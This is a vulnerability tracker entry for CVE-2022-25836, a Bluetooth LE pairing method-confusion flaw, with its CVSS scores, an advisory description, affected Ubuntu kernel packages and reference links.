CVSS3
Attack Vector
ADJACENT
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
EPSS
Percentile
23.0%
Bluetooth® Low Energy Pairing in Bluetooth Core Specification v4.0 through
v5.3 may permit an unauthenticated MITM to acquire credentials with two
pairing devices via adjacent access when the MITM negotiates Legacy Passkey
Pairing with the pairing Initiator and Secure Connections Passkey Pairing
with the pairing Responder and brute forces the Passkey entered by the user
into the Initiator. The MITM attacker can use the identified Passkey value
to complete authentication with the Responder via Bluetooth pairing method
confusion.
Author | Note |
---|---|
sbeattie | unfixed upstream as of 2023.01.10 |
OS | Version | Architecture | Package | Version | Filename |
---|---|---|---|---|---|
ubuntu | 18.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 20.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 22.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 24.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 14.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 16.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 20.04 | noarch | linux-aws | < any | UNKNOWN |
ubuntu | 22.04 | noarch | linux-aws | < any | UNKNOWN |
ubuntu | 24.04 | noarch | linux-aws | < any | UNKNOWN |
ubuntu | 20.04 | noarch | linux-aws-5.15 | < any | UNKNOWN |
launchpad.net/bugs/cve/CVE-2022-25836
nvd.nist.gov/vuln/detail/CVE-2022-25836
security-tracker.debian.org/tracker/CVE-2022-25836
www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/confusion-in-ble-passkey/
www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/
www.cve.org/CVERecord?id=CVE-2022-25836